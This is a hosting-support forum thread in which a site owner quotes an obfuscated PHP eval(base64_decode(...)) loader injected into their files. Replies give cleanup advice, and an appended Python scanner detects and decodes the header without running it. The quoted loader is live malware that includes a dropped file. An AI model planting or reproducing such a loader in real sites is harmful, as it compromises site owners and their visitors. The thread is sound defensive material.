slick

Code Being Inserted Into My Files


Several files on my hosting account have been edited without my permission.

Some code has been inserted at the top.

 

><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3RyaW5pdGsvcHVibGljX2h0bWwvdjEvbW9kdWxlcy9Gb3J1bXMvdGVtcGxhdGVzL3N1YlNpbHZlci9pbWFnZXMvbGFuZ19lbmdsaXNoL2NvcHBlci5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

 

The file permission is 644.

I don't understand how this could happen but it's like almost half the files on my account have been hacked.

 

Is there any easy way to change them back to how they were before?

 

The attack occurred on December 17th 2009.

21:00 server time.


You will need to submit a ticket with the help desk and

 

1) ask them to check if the account has been compromised. Link on top of page and in my signature.

 

2) ask them if they have backups to replace the hacked files with (unless you have backups, which is your responsibility to have).

 

3) then change passwords (cPanel, database, emails), and make sure every script etc. you use is of the most recent and secure version.


if you're using an outdated version of some script, restoring your files won't be of much help. such hacks are usually done automatically once your site is known to be hackable. this exact thing happened to me a long time ago when I was using an outdated version of WordPress. only an upgrade will keep you relatively safe.

 

Is there any easy way to change them back to how they were before?

not if you don't have the originals. if you do, though, use something like WinMerge to compare the current and the originals to find the differences. make sure that you not only check the files, but the contents of the directories! make sure there are no new files on your site.

 

if TCH backups are not far back enough, and you are using an open-source script, you'll most likely be able to download an original copy of the version of the script you're using.

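An added example, not part of any post in this thread: a Python sketch that walks a site tree, finds files starting with the `<?php /**/eval(base64_decode('...')); ?>` header shown in the first post, and decodes the payload as text (never executing it) so that any dropped `.php` file it references can be located. It goes beyond the manual comparison suggested above; the sample tree, the stand-in payload and all function names are constructed for illustration.

```python
import base64, re, tempfile
from pathlib import Path

# Matches the injected header shape shown in the first post, anchored at the
# very start of the file: <?php /**/eval(base64_decode('...')); ?>
INJECTED = re.compile(
    rb"\A\s*<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")
PHP_PATH = re.compile(r"'(/[^']+\.php)'")  # quoted absolute .php paths in the payload

def inspect_file(data: bytes):
    """Return (decoded_payload, bytes_after_header) if the header is present, else None.
    The payload is only base64-decoded for reading; it is never evaluated."""
    m = INJECTED.match(data)
    if not m:
        return None
    try:
        payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        payload = "<undecodable>"
    return payload, data[m.end():]

def scan(root: Path):
    """Map each file carrying the header to the .php paths its payload references."""
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            hit = inspect_file(path.read_bytes())
            if hit:
                report[path.relative_to(root).as_posix()] = PHP_PATH.findall(hit[0])
    return report

def demo():
    # Constructed sample tree; the payload is a harmless stand-in, not the one in the post.
    fake = base64.b64encode(b"include_once('/home/example/public_html/images/dropped.php');")
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_bytes(
        b"<?php /**/eval(base64_decode('" + fake + b"')); ?><?php echo 'home'; ?>\n")
    (root / "clean.php").write_bytes(b"<?php echo 'ok'; ?>\n")
    return scan(root), inspect_file((root / "index.php").read_bytes())[1]

if __name__ == "__main__":
    print(demo())
```

The paths reported by `scan` point at files that did not belong to the original site and need removing along with the headers. The bytes after the header are a candidate for diffing against a backup, not a substitute for restoring from one.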
